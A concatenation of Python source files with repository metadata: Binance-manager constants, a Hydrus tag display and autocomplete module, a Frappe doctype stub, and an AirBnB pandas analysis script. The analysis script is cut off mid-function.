| 0.586978
|
794b0cad715b1e543eed3097b92290d9b6fac996
| 1,874
|
py
|
Python
|
src/Utils/sad.py
|
ChrisChV/Binance-Manager
|
840e83e5e5586022ed2b9a181342d32e1e973ab7
|
[
"MIT"
] | null | null | null |
src/Utils/sad.py
|
ChrisChV/Binance-Manager
|
840e83e5e5586022ed2b9a181342d32e1e973ab7
|
[
"MIT"
] | null | null | null |
src/Utils/sad.py
|
ChrisChV/Binance-Manager
|
840e83e5e5586022ed2b9a181342d32e1e973ab7
|
[
"MIT"
] | null | null | null |
from decimal import *
_DF_ = "/"
_BINANCE_MODULE_DIR_NAME_ = "Binance"
_KEYS_FILE_NAME_ = ".keys"
_KEYS_FILE_PATH_ = _BINANCE_MODULE_DIR_NAME_ + _DF_ + _KEYS_FILE_NAME_
_CONFIG_FILE_NAME_ = "bm.conf"
_ENTRY_TYPE_ = 0
_LOSE_TYPE_ = 1
_PROFIT_TYPE_ = 2
_INIT_STATE_ = 0
_WAITING_STATE_ = 1
_OPEN_STATE_ = 2
_FILLED_STATE_ = 3
_CANCELED_STATE_ = 4
_DISABLED_STATE_ = 5
_FUNCTION_SIMPLE_ = 0
_FUNCTION_HALF_ = 1
_FUNCTION_INFINITE_P_ = 2
PRICE_DECIMALS = Decimal(10) ** -8
QUANTITY_DECIMALS = Decimal(10) ** -5
_BINANCE_SYM_LIST_ = ["BNB", 'BTC', 'ETH', 'XRP', 'USDT', 'PAX', 'TUSD', 'USDC', 'USDS']
_TRANSACTION_TABLE_NAME_ = "Transaction"
_SYMBOL_COL_NAME_ = "symbol"
_ORDER_TABLE_NAME_ = "Binance_Order"
_TRANSACTION_ID_COL_NAME_ = "transaction_id"
_PRICE_COL_NAME_ = "price"
_QUANTITY_COL_NAME_ = "quantity"
_TYPE_COL_NAME_ = "type"
_STATE_COL_NAME_ = "state"
_BINANCE_ID_COL_NAME_ = "binance_id"
_DATES_TABLE_NAME_ = "Dates"
_ORDER_ID_COL_NAME_ = "order_id"
_DATE_COL_NAME_ = "date"
_FUNCTION_COL_NAME_ = "function"
_CONFIG_LOGGER_SECTION_ = "Logger"
_CONFIG_TYPE_OPTION_ = "type"
_CONFIG_CONSOLE_VALUE_ = "console"
_CONFIG_TELEGRAM_VALUE_ = "telegram"
_CONFIG_TELEGRAM_TOKEN_OPTION_ = "token"
_CONFIG_TELEGRAM_CHATID_OPTION_ = "chatId"
_CONFIG_INPUT_SECTION_ = "Input"
_CONFIG_HOST_SECTION_ = "host"
_JSON_FUNCTION_ = "function"
_JSON_OPERATION_TYPE_ = "oper_type"
_JSON_SYMBOL_ = "symbol"
_JSON_ENTRY_ = "entry"
_JSON_LOSE_ = "lose"
_JSON_PROFIT_ = "profit"
_JSON_ENTRY_STATE_ = "entry_state"
_JSON_LOSE_STATE_ = "lose_state"
_JSON_PROFIT_STATE_ = "profit_state"
_JSON_QUANTITY_ = "quantity"
_JSON_TRANSACTION_ID_ = "tran_id"
_JSON_STATE_ = "state"
_PING_OPERATION_TYPE_ = "ping"
_NEW_OPERATION_TYPE_ = "new"
_PROGRESS_OPERATION_TYPE_ = "progress"
_CANCEL_OPERATION_TYPE_ = "cancel"
_DISABLE_OPERATION_TYPE_ = "disable"
_GET_OPEN_OPERATION_TYPE_ = "open"
| 24.337662
| 88
| 0.785486
|
794b0cf30cd329bdb77be49a089f66cc60264ede
| 101
|
py
|
Python
|
hnn/src/utils/__init__.py
|
anlewy/mt-dnn
|
eeb6f01ce0630e61a52b8c9c6f7537cd34978e45
|
[
"MIT"
] | 2,075
|
2019-02-25T08:54:38.000Z
|
2022-03-31T10:44:50.000Z
|
hnn/src/utils/__init__.py
|
anlewy/mt-dnn
|
eeb6f01ce0630e61a52b8c9c6f7537cd34978e45
|
[
"MIT"
] | 176
|
2019-03-12T02:58:42.000Z
|
2022-03-22T20:17:23.000Z
|
hnn/src/utils/__init__.py
|
anlewy/mt-dnn
|
eeb6f01ce0630e61a52b8c9c6f7537cd34978e45
|
[
"MIT"
] | 437
|
2019-03-11T21:36:21.000Z
|
2022-03-29T02:40:53.000Z
|
"""
utils
@Author: penhe@microsoft.com
"""
from .logger_util import *
from .argument_types import *
| 12.625
| 29
| 0.722772
|
794b0dd605a6f08b3d22fa7b8a0b1245605c6964
| 207
|
py
|
Python
|
instrument/instrument/doctype/purchasing_package_table/purchasing_package_table.py
|
pradyotraina/rushabhinstruments_V13
|
18c4646ea2171e946c2ca1403d0ed2e32a9dd144
|
[
"MIT"
] | 1
|
2021-07-14T12:34:14.000Z
|
2021-07-14T12:34:14.000Z
|
instrument/instrument/doctype/purchasing_package_table/purchasing_package_table.py
|
pradyotraina/rushabhinstruments_V13
|
18c4646ea2171e946c2ca1403d0ed2e32a9dd144
|
[
"MIT"
] | null | null | null |
instrument/instrument/doctype/purchasing_package_table/purchasing_package_table.py
|
pradyotraina/rushabhinstruments_V13
|
18c4646ea2171e946c2ca1403d0ed2e32a9dd144
|
[
"MIT"
] | 4
|
2021-07-06T10:01:11.000Z
|
2021-12-28T20:40:30.000Z
|
# Copyright (c) 2021, instrument and contributors
# For license information, please see license.txt
# import frappe
from frappe.model.document import Document
class PurchasingPackageTable(Document):
pass
| 23
| 49
| 0.806763
|
794b0e34290954a6e19b28b996c18efdad1707d8
| 32,559
|
py
|
Python
|
hydrus/client/metadata/ClientTagsHandling.py
|
bbappserver/hydrus-build-test
|
de7868c2f549faaf4a189b120cddcb39d16a64ba
|
[
"WTFPL"
] | null | null | null |
hydrus/client/metadata/ClientTagsHandling.py
|
bbappserver/hydrus-build-test
|
de7868c2f549faaf4a189b120cddcb39d16a64ba
|
[
"WTFPL"
] | null | null | null |
hydrus/client/metadata/ClientTagsHandling.py
|
bbappserver/hydrus-build-test
|
de7868c2f549faaf4a189b120cddcb39d16a64ba
|
[
"WTFPL"
] | null | null | null |
import collections
import random
import threading
import time
import typing
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusData
from hydrus.core import HydrusExceptions
from hydrus.core import HydrusGlobals as HG
from hydrus.core import HydrusSerialisable
from hydrus.core import HydrusTags
from hydrus.client import ClientConstants as CC
from hydrus.client import ClientServices
from hydrus.client.metadata import ClientTags
class TagAutocompleteOptions( HydrusSerialisable.SerialisableBase ):
SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_TAG_AUTOCOMPLETE_OPTIONS
SERIALISABLE_NAME = 'Tag Autocomplete Options'
SERIALISABLE_VERSION = 3
def __init__( self, service_key: typing.Optional[ bytes ] = None ):
if service_key is None:
service_key = CC.COMBINED_TAG_SERVICE_KEY
HydrusSerialisable.SerialisableBase.__init__( self )
self._service_key = service_key
self._write_autocomplete_tag_domain = self._service_key
self._override_write_autocomplete_file_domain = True
if service_key == CC.DEFAULT_LOCAL_TAG_SERVICE_KEY:
self._write_autocomplete_file_domain = CC.LOCAL_FILE_SERVICE_KEY
else:
self._write_autocomplete_file_domain = CC.COMBINED_FILE_SERVICE_KEY
self._search_namespaces_into_full_tags = False
self._namespace_bare_fetch_all_allowed = False
self._namespace_fetch_all_allowed = False
self._fetch_all_allowed = False
self._fetch_results_automatically = True
self._exact_match_character_threshold = 2
def _GetSerialisableInfo( self ):
serialisable_service_key = self._service_key.hex()
serialisable_write_autocomplete_tag_domain = self._write_autocomplete_tag_domain.hex()
serialisable_write_autocomplete_file_domain = self._write_autocomplete_file_domain.hex()
serialisable_info = [
serialisable_service_key,
serialisable_write_autocomplete_tag_domain,
self._override_write_autocomplete_file_domain,
serialisable_write_autocomplete_file_domain,
self._search_namespaces_into_full_tags,
self._namespace_bare_fetch_all_allowed,
self._namespace_fetch_all_allowed,
self._fetch_all_allowed,
self._fetch_results_automatically,
self._exact_match_character_threshold
]
return serialisable_info
def _InitialiseFromSerialisableInfo( self, serialisable_info ):
[
serialisable_service_key,
serialisable_write_autocomplete_tag_domain,
self._override_write_autocomplete_file_domain,
serialisable_write_autocomplete_file_domain,
self._search_namespaces_into_full_tags,
self._namespace_bare_fetch_all_allowed,
self._namespace_fetch_all_allowed,
self._fetch_all_allowed,
self._fetch_results_automatically,
self._exact_match_character_threshold
] = serialisable_info
self._service_key = bytes.fromhex( serialisable_service_key )
self._write_autocomplete_tag_domain = bytes.fromhex( serialisable_write_autocomplete_tag_domain )
self._write_autocomplete_file_domain = bytes.fromhex( serialisable_write_autocomplete_file_domain )
def _UpdateSerialisableInfo( self, version, old_serialisable_info ):
if version == 1:
[
serialisable_service_key,
serialisable_write_autocomplete_tag_domain,
override_write_autocomplete_file_domain,
serialisable_write_autocomplete_file_domain,
search_namespaces_into_full_tags,
namespace_fetch_all_allowed,
fetch_all_allowed
] = old_serialisable_info
namespace_bare_fetch_all_allowed = False
new_serialisable_info = [
serialisable_service_key,
serialisable_write_autocomplete_tag_domain,
override_write_autocomplete_file_domain,
serialisable_write_autocomplete_file_domain,
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
]
return ( 2, new_serialisable_info )
if version == 2:
[
serialisable_service_key,
serialisable_write_autocomplete_tag_domain,
override_write_autocomplete_file_domain,
serialisable_write_autocomplete_file_domain,
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
] = old_serialisable_info
fetch_results_automatically = True
exact_match_character_threshold = 2
new_serialisable_info = [
serialisable_service_key,
serialisable_write_autocomplete_tag_domain,
override_write_autocomplete_file_domain,
serialisable_write_autocomplete_file_domain,
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed,
fetch_results_automatically,
exact_match_character_threshold
]
return ( 3, new_serialisable_info )
def FetchAllAllowed( self ):
return self._fetch_all_allowed
def FetchResultsAutomatically( self ):
return self._fetch_results_automatically
def GetExactMatchCharacterThreshold( self ):
return self._exact_match_character_threshold
def GetServiceKey( self ):
return self._service_key
def GetWriteAutocompleteFileDomain( self ):
return self._write_autocomplete_file_domain
def GetWriteAutocompleteServiceKeys( self, file_service_key: bytes ):
tag_service_key = self._service_key
if self._service_key != CC.COMBINED_TAG_SERVICE_KEY:
if self._override_write_autocomplete_file_domain:
file_service_key = self._write_autocomplete_file_domain
tag_service_key = self._write_autocomplete_tag_domain
if file_service_key == CC.COMBINED_FILE_SERVICE_KEY and tag_service_key == CC.COMBINED_TAG_SERVICE_KEY: # ruh roh
file_service_key = CC.COMBINED_LOCAL_FILE_SERVICE_KEY
return ( file_service_key, tag_service_key )
def GetWriteAutocompleteTagDomain( self ):
return self._write_autocomplete_tag_domain
def NamespaceBareFetchAllAllowed( self ):
return self._namespace_bare_fetch_all_allowed
def NamespaceFetchAllAllowed( self ):
return self._namespace_fetch_all_allowed
def OverridesWriteAutocompleteFileDomain( self ):
return self._override_write_autocomplete_file_domain
def SearchNamespacesIntoFullTags( self ):
return self._search_namespaces_into_full_tags
def SetExactMatchCharacterThreshold( self, exact_match_character_threshold: typing.Optional[ int ] ):
self._exact_match_character_threshold = exact_match_character_threshold
def SetFetchResultsAutomatically( self, fetch_results_automatically: bool ):
self._fetch_results_automatically = fetch_results_automatically
def SetTuple( self,
write_autocomplete_tag_domain: bytes,
override_write_autocomplete_file_domain: bool,
write_autocomplete_file_domain: bytes,
search_namespaces_into_full_tags: bool,
namespace_bare_fetch_all_allowed: bool,
namespace_fetch_all_allowed: bool,
fetch_all_allowed: bool
):
self._write_autocomplete_tag_domain = write_autocomplete_tag_domain
self._override_write_autocomplete_file_domain = override_write_autocomplete_file_domain
self._write_autocomplete_file_domain = write_autocomplete_file_domain
self._search_namespaces_into_full_tags = search_namespaces_into_full_tags
self._namespace_bare_fetch_all_allowed = namespace_bare_fetch_all_allowed
self._namespace_fetch_all_allowed = namespace_fetch_all_allowed
self._fetch_all_allowed = fetch_all_allowed
HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_TAG_AUTOCOMPLETE_OPTIONS ] = TagAutocompleteOptions
class TagDisplayMaintenanceManager( object ):
def __init__( self, controller ):
self._controller = controller
self._service_keys_to_needs_work = {}
self._go_faster = set()
self._last_loop_work_time = 0.5
self._shutdown = False
self._mainloop_finished = False
self._wake_event = threading.Event()
self._new_data_event = threading.Event()
self._last_last_new_data_event_time = 0
self._last_new_data_event_time = 0
self._lock = threading.Lock()
self._controller.sub( self, 'Shutdown', 'shutdown' )
self._controller.sub( self, 'NotifyNewDisplayData', 'notify_new_tag_display_application' )
def _GetAfterWorkWaitTime( self, service_key ):
with self._lock:
if service_key in self._go_faster:
if service_key in self._service_keys_to_needs_work and not self._service_keys_to_needs_work[ service_key ]:
self._go_faster.discard( service_key )
return 0.1
if self._controller.CurrentlyIdle():
return 0.5
else:
return 30
def _GetServiceKeyToWorkOn( self ):
if len( self._go_faster ) > 0:
service_keys_that_need_work = list( self._go_faster )
else:
service_keys_that_need_work = [ service_key for ( service_key, needs_work ) in self._service_keys_to_needs_work.items() if needs_work ]
if len( service_keys_that_need_work ) == 0:
raise HydrusExceptions.NotFoundException( 'No service keys need work!' )
( service_key, ) = random.sample( service_keys_that_need_work, 1 )
return service_key
def _GetWorkTime( self, service_key ):
with self._lock:
if service_key in self._go_faster:
ideally = 30
base = max( 0.5, self._last_loop_work_time )
accelerating_time = min( base * 1.2, ideally )
return accelerating_time
if self._controller.CurrentlyIdle():
return 15
else:
return 0.5
def _WorkPermitted( self ):
if len( self._go_faster ) > 0:
return True
# we are getting new display data pretty fast. if it is streaming in, let's take a break
if not HydrusData.TimeHasPassed( self._last_last_new_data_event_time + 10 ):
return False
if self._controller.CurrentlyIdle():
if self._controller.new_options.GetBoolean( 'tag_display_maintenance_during_idle' ):
return True
else:
if self._controller.new_options.GetBoolean( 'tag_display_maintenance_during_active' ):
return True
return False
def _WorkToDo( self ):
can_do_work = False
service_keys = self._controller.services_manager.GetServiceKeys( HC.REAL_TAG_SERVICES )
for service_key in service_keys:
if service_key not in self._service_keys_to_needs_work:
status = self._controller.Read( 'tag_display_maintenance_status', service_key )
self._service_keys_to_needs_work[ service_key ] = status[ 'num_siblings_to_sync' ] + status[ 'num_parents_to_sync' ] > 0
if self._service_keys_to_needs_work[ service_key ]:
can_do_work = True
return can_do_work
def CurrentlyGoingFaster( self, service_key ):
with self._lock:
return service_key in self._go_faster
def FlipSyncFaster( self, service_key ):
with self._lock:
if service_key in self._go_faster:
self._go_faster.discard( service_key )
else:
self._go_faster.add( service_key )
self._controller.pub( 'notify_new_tag_display_sync_status', service_key )
self.Wake()
def IsShutdown( self ):
return self._mainloop_finished
def MainLoop( self ):
try:
INIT_WAIT = 10
self._wake_event.wait( INIT_WAIT )
while not ( HG.view_shutdown or self._shutdown ):
if self._WorkPermitted() and self._WorkToDo():
try:
service_key = self._GetServiceKeyToWorkOn()
except HydrusExceptions.NotFoundException:
time.sleep( 5 )
continue
work_time = self._GetWorkTime( service_key )
still_needs_work = self._controller.WriteSynchronous( 'sync_tag_display_maintenance', service_key, work_time )
self._service_keys_to_needs_work[ service_key ] = still_needs_work
wait_time = self._GetAfterWorkWaitTime( service_key )
self._last_loop_work_time = work_time
else:
wait_time = 10
self._wake_event.wait( wait_time )
self._wake_event.clear()
if self._new_data_event.is_set():
time.sleep( 1 )
self._last_last_new_data_event_time = self._last_new_data_event_time
self._last_new_data_event_time = HydrusData.GetNow()
self._service_keys_to_needs_work = {}
self._new_data_event.clear()
finally:
self._mainloop_finished = True
def NotifyNewDisplayData( self ):
self._new_data_event.set()
self.Wake()
def Shutdown( self ):
self._shutdown = True
self.Wake()
def Start( self ):
self._controller.CallToThreadLongRunning( self.MainLoop )
def Wake( self ):
self._wake_event.set()
class TagDisplayManager( HydrusSerialisable.SerialisableBase ):
SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_TAG_DISPLAY_MANAGER
SERIALISABLE_NAME = 'Tag Display Manager'
SERIALISABLE_VERSION = 4
def __init__( self ):
HydrusSerialisable.SerialisableBase.__init__( self )
service_keys_to_tag_filters_defaultdict = lambda: collections.defaultdict( HydrusTags.TagFilter )
self._tag_display_types_to_service_keys_to_tag_filters = collections.defaultdict( service_keys_to_tag_filters_defaultdict )
self._tag_service_keys_to_tag_autocomplete_options = dict()
self._lock = threading.Lock()
self._dirty = False
def _GetSerialisableInfo( self ):
serialisable_tag_display_types_to_service_keys_to_tag_filters = []
for ( tag_display_type, service_keys_to_tag_filters ) in self._tag_display_types_to_service_keys_to_tag_filters.items():
serialisable_service_keys_to_tag_filters = [ ( service_key.hex(), tag_filter.GetSerialisableTuple() ) for ( service_key, tag_filter ) in service_keys_to_tag_filters.items() ]
serialisable_tag_display_types_to_service_keys_to_tag_filters.append( ( tag_display_type, serialisable_service_keys_to_tag_filters ) )
serialisable_tag_autocomplete_options = HydrusSerialisable.SerialisableList( self._tag_service_keys_to_tag_autocomplete_options.values() ).GetSerialisableTuple()
serialisable_info = [
serialisable_tag_display_types_to_service_keys_to_tag_filters,
serialisable_tag_autocomplete_options
]
return serialisable_info
def _InitialiseFromSerialisableInfo( self, serialisable_info ):
[
serialisable_tag_display_types_to_service_keys_to_tag_filters,
serialisable_tag_autocomplete_options
] = serialisable_info
for ( tag_display_type, serialisable_service_keys_to_tag_filters ) in serialisable_tag_display_types_to_service_keys_to_tag_filters:
for ( serialisable_service_key, serialisable_tag_filter ) in serialisable_service_keys_to_tag_filters:
service_key = bytes.fromhex( serialisable_service_key )
tag_filter = HydrusSerialisable.CreateFromSerialisableTuple( serialisable_tag_filter )
self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ service_key ] = tag_filter
self._tag_service_keys_to_tag_autocomplete_options = { tag_autocomplete_options.GetServiceKey() : tag_autocomplete_options for tag_autocomplete_options in HydrusSerialisable.CreateFromSerialisableTuple( serialisable_tag_autocomplete_options ) }
def _UpdateSerialisableInfo( self, version, old_serialisable_info ):
if version == 1:
serialisable_tag_display_types_to_service_keys_to_tag_filters = old_serialisable_info
tag_autocomplete_options_list = HydrusSerialisable.SerialisableList()
new_serialisable_info = [
serialisable_tag_display_types_to_service_keys_to_tag_filters,
tag_autocomplete_options_list.GetSerialisableTuple()
]
return ( 2, new_serialisable_info )
if version == 2:
[
serialisable_tag_display_types_to_service_keys_to_tag_filters,
serialisable_tag_autocomplete_options
] = old_serialisable_info
service_keys_to_ordered_sibling_service_keys = collections.defaultdict( list )
service_keys_to_ordered_parent_service_keys = collections.defaultdict( list )
serialisable_service_keys_to_ordered_sibling_service_keys = HydrusSerialisable.SerialisableBytesDictionary( service_keys_to_ordered_sibling_service_keys ).GetSerialisableTuple()
serialisable_service_keys_to_ordered_parent_service_keys = HydrusSerialisable.SerialisableBytesDictionary( service_keys_to_ordered_parent_service_keys ).GetSerialisableTuple()
new_serialisable_info = [
serialisable_tag_display_types_to_service_keys_to_tag_filters,
serialisable_tag_autocomplete_options,
serialisable_service_keys_to_ordered_sibling_service_keys,
serialisable_service_keys_to_ordered_parent_service_keys
]
return ( 3, new_serialisable_info )
if version == 3:
# took it out again lmao, down to the db
[
serialisable_tag_display_types_to_service_keys_to_tag_filters,
serialisable_tag_autocomplete_options,
serialisable_service_keys_to_ordered_sibling_service_keys,
serialisable_service_keys_to_ordered_parent_service_keys
] = old_serialisable_info
new_serialisable_info = [
serialisable_tag_display_types_to_service_keys_to_tag_filters,
serialisable_tag_autocomplete_options
]
return ( 4, new_serialisable_info )
def ClearTagDisplayOptions( self ):
with self._lock:
service_keys_to_tag_filters_defaultdict = lambda: collections.defaultdict( HydrusTags.TagFilter )
self._tag_display_types_to_service_keys_to_tag_filters = collections.defaultdict( service_keys_to_tag_filters_defaultdict )
self._tag_service_keys_to_tag_autocomplete_options = dict()
def SetClean( self ):
with self._lock:
self._dirty = False
def SetDirty( self ):
with self._lock:
self._dirty = True
def FilterTags( self, tag_display_type, service_key, tags ):
with self._lock:
if service_key in self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ]:
tag_filter = self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ service_key ]
tags = tag_filter.Filter( tags )
if service_key != CC.COMBINED_TAG_SERVICE_KEY and CC.COMBINED_TAG_SERVICE_KEY in self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ]:
tag_filter = self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ CC.COMBINED_TAG_SERVICE_KEY ]
tags = tag_filter.Filter( tags )
return tags
def FiltersTags( self, tag_display_type, service_key ):
with self._lock:
if service_key in self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ]:
return True
if service_key != CC.COMBINED_TAG_SERVICE_KEY and CC.COMBINED_TAG_SERVICE_KEY in self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ]:
return True
return False
def GetTagAutocompleteOptions( self, service_key: bytes ):
with self._lock:
if service_key not in self._tag_service_keys_to_tag_autocomplete_options:
tag_autocomplete_options = TagAutocompleteOptions( service_key )
self._tag_service_keys_to_tag_autocomplete_options[ service_key ] = tag_autocomplete_options
return self._tag_service_keys_to_tag_autocomplete_options[ service_key ]
def GetTagFilter( self, tag_display_type, service_key ):
with self._lock:
return self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ service_key ].Duplicate()
def HideTag( self, tag_display_type, service_key, tag ):
with self._lock:
tag_filter = self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ service_key ]
tag_filter.SetRule( tag, HC.FILTER_BLACKLIST )
self._dirty = True
def IsDirty( self ):
with self._lock:
return self._dirty
def SetTagAutocompleteOptions( self, tag_autocomplete_options: TagAutocompleteOptions ):
with self._lock:
self._tag_service_keys_to_tag_autocomplete_options[ tag_autocomplete_options.GetServiceKey() ] = tag_autocomplete_options
def SetTagFilter( self, tag_display_type, service_key, tag_filter ):
with self._lock:
if tag_filter.AllowsEverything():
if service_key in self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ]:
del self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ service_key ]
self._dirty = True
else:
self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ service_key ] = tag_filter
self._dirty = True
def TagOK( self, tag_display_type, service_key, tag ):
return len( self.FilterTags( tag_display_type, service_key, ( tag, ) ) ) > 0
HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_TAG_DISPLAY_MANAGER ] = TagDisplayManager
class TagParentsStructure( object ):
def __init__( self ):
self._descendants_to_ancestors = collections.defaultdict( set )
self._ancestors_to_descendants = collections.defaultdict( set )
# some sort of structure for 'bad cycles' so we can later raise these to the user to fix
def AddPair( self, child: object, parent: object ):
# disallowed parents are:
# A -> A
# larger loops
if child == parent:
return
if parent in self._descendants_to_ancestors:
if child in self._descendants_to_ancestors[ parent ]:
# this is a loop!
return
if child in self._descendants_to_ancestors and parent in self._descendants_to_ancestors[ child ]:
# already in
return
# let's now gather all ancestors of parent and all descendants of child
new_ancestors = { parent }
if parent in self._descendants_to_ancestors:
new_ancestors.update( self._descendants_to_ancestors[ parent ] )
new_descendants = { child }
if child in self._ancestors_to_descendants:
new_descendants.update( self._ancestors_to_descendants[ child ] )
# every (grand)parent now gets all new (grand)kids
for ancestor in new_ancestors:
self._ancestors_to_descendants[ ancestor ].update( new_descendants )
# every (grand)kid now gets all new (grand)parents
for descendant in new_descendants:
self._descendants_to_ancestors[ descendant ].update( new_ancestors )
def GetTagsToAncestors( self ):
return self._descendants_to_ancestors
def IterateDescendantAncestorPairs( self ):
for ( descandant, ancestors ) in self._descendants_to_ancestors.items():
for ancestor in ancestors:
yield ( descandant, ancestor )
class TagSiblingsStructure( object ):
def __init__( self ):
self._bad_tags_to_good_tags = {}
self._bad_tags_to_ideal_tags = {}
self._ideal_tags_to_all_worse_tags = collections.defaultdict( set )
# some sort of structure for 'bad cycles' so we can later raise these to the user to fix
def AddPair( self, bad_tag: object, good_tag: object ):
# disallowed siblings are:
# A -> A
# larger loops
# A -> C when A -> B already exists
if bad_tag == good_tag:
return
if bad_tag in self._bad_tags_to_good_tags:
return
joining_existing_chain = good_tag in self._bad_tags_to_ideal_tags
extending_existing_chain = bad_tag in self._ideal_tags_to_all_worse_tags
if extending_existing_chain and joining_existing_chain:
joined_chain_ideal = self._bad_tags_to_ideal_tags[ good_tag ]
if joined_chain_ideal == bad_tag:
# we found a cycle, as the ideal of the chain we are joining is our bad tag
# basically the chain we are joining and the chain we are extending are the same one
return
# now compute our ideal
ideal_tags_that_need_updating = set()
if joining_existing_chain:
# our ideal will be the end of that chain
ideal_tag = self._bad_tags_to_ideal_tags[ good_tag ]
else:
ideal_tag = good_tag
self._bad_tags_to_good_tags[ bad_tag ] = good_tag
self._bad_tags_to_ideal_tags[ bad_tag ] = ideal_tag
self._ideal_tags_to_all_worse_tags[ ideal_tag ].add( bad_tag )
if extending_existing_chain:
# the existing chain needs its ideal updating
old_ideal_tag = bad_tag
bad_tags_that_need_updating = self._ideal_tags_to_all_worse_tags[ old_ideal_tag ]
for bad_tag_that_needs_updating in bad_tags_that_need_updating:
self._bad_tags_to_ideal_tags[ bad_tag_that_needs_updating ] = ideal_tag
self._ideal_tags_to_all_worse_tags[ ideal_tag ].update( bad_tags_that_need_updating )
del self._ideal_tags_to_all_worse_tags[ old_ideal_tag ]
def GetBadTagsToIdealTags( self ):
return self._bad_tags_to_ideal_tags
| 33.325486
| 252
| 0.581682
|
794b0eee657db516c725d2d35f15819da5d490ca
| 17,648
|
py
|
Python
|
functions_for_AirBnB.py
|
dalpengholic/Udacity_Boston-AirBNB-Data
|
ef918f4ddf8041a9f646e6fe786730f191746c2b
|
[
"MIT"
] | null | null | null |
functions_for_AirBnB.py
|
dalpengholic/Udacity_Boston-AirBNB-Data
|
ef918f4ddf8041a9f646e6fe786730f191746c2b
|
[
"MIT"
] | null | null | null |
functions_for_AirBnB.py
|
dalpengholic/Udacity_Boston-AirBNB-Data
|
ef918f4ddf8041a9f646e6fe786730f191746c2b
|
[
"MIT"
] | null | null | null |
# The collection of functions for the Boston AirBnB dataset
# import necessary libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from pandas.tseries.holiday import USFederalHolidayCalendar as calendar #To check holidays in the U.S
import time
import copy
def load_bnb_files():
'''Load AirBnB files'''
df_listing = pd.read_csv('./data/listings.csv')
df_calendar = pd.read_csv('./data/calendar.csv')
return df_listing, df_calendar
# Modify df_calendar for future work
# Special event : marathon, new academic season
def modify_calendar(df_calendar):
'''
This function creates 'year', 'month', 'day', 'weekday', and 'week_number' columns from 'date' coulmn of df_calendar
and remove '$' string from 'price' coulmn.
Input : a Pandas dataframe having a date data column
Output : a Pandas dataframe having year, month, day, weekday, us_holiday columns
'''
# Split date column into year, month,day, weekday columns
# The day of the week with Monday=0, Sunday=6
# Set the range of weekends from Friday to Sunday
df_calendar['year'] = pd.DatetimeIndex(df_calendar['date']).year
df_calendar['month'] = pd.DatetimeIndex(df_calendar['date']).month
df_calendar['day'] = pd.DatetimeIndex(df_calendar['date']).day
df_calendar['weekday'] = pd.DatetimeIndex(df_calendar['date']).weekday
df_calendar['week_number'] = pd.DatetimeIndex(df_calendar['date']).week
df_calendar['price']= df_calendar['price'].str.replace('$','')
df_calendar['price']=df_calendar['price'].str.replace(',','')
df_calendar['price'] = df_calendar['price'].astype(float)
# Add us_holiday column
cal = calendar()
holidays = cal.holidays(start=df_calendar.date.min(), end=df_calendar.date.max())
df_calendar['us_holiday'] = df_calendar.date.astype('datetime64').isin(holidays)
# Add weekend column #Friday, Saturday
weekend = [4,5]
df_calendar['weekend'] = df_calendar.weekday.isin(weekend)
# Replace values in weekday column
df_calendar['weekday'].replace({0:'Monday', 1:'Tuesday', 2:'Wednesday', 3:'Thursday',4:'Friday', 5:'Saturday', 6:'Sunday'}, inplace=True)
return df_calendar
def add_availabledays_price(df_listing, df_cal_modified):
'''
This function creates the columns of 'unavail_days', 'avail_days_weekends',
'avail_days_weekdays', 'price_weekend', and 'price_weekday' where calculated from df_cal_modified on df_listing.
Input :
- A Pandas dataframe made from 'listings.csv' : df_listing
- A pandas dataframe modified by modify_calendar() : df_cal_modified
Output :
- The modified df_listing dataframe with new 'unavail_days', 'avail_days_weekends',
'avail_days_weekdays', 'price_weekend', and 'price_weekday' columns
'''
id_list = df_listing.id[:]
unavailable_days_array = np.array([])
avail_days_weekends_array = np.array([])
avail_days_weekdays_array = np.array([])
price_weekend_array = np.array([])
price_weekday_array = np.array([])
for i in np.nditer(id_list):
tmp = df_cal_modified[(df_cal_modified.listing_id == i)] # Make a dataframe coming from df_listing with a certain id
available_dict = tmp.available.value_counts().to_dict()
if 'f' in available_dict:
unavailable_days = tmp[tmp.available == 'f'].shape[0]
else:
unavailable_days = 0
if 't' in available_dict:
available_weekends = tmp[(tmp.available == 't') & (tmp.weekend == True)].shape[0]
available_weekdays = tmp[(tmp.available == 't') & (tmp.weekend == False)].shape[0]
price_weekend = tmp[(tmp.weekend == True) & (tmp.available == 't')].price.astype(float).describe()['mean']
price_weekday = tmp[(tmp.weekend == False) & (tmp.available == 't')].price.astype(float).describe()['mean']
else:
available_weekends = 0
available_weekdays = 0
price_weekend = np.nan
price_weekday = np.nan
unavailable_days_array = np.append(unavailable_days_array, unavailable_days)
avail_days_weekends_array = np.append(avail_days_weekends_array, available_weekends)
avail_days_weekdays_array = np.append(avail_days_weekdays_array, available_weekdays)
price_weekend_array = np.append(price_weekend_array, price_weekend)
price_weekday_array = np.append(price_weekday_array, price_weekday)
df_listing['unavail_days'] = pd.Series(unavailable_days_array)
df_listing['avail_days_weekends'] = pd.Series(avail_days_weekends_array)
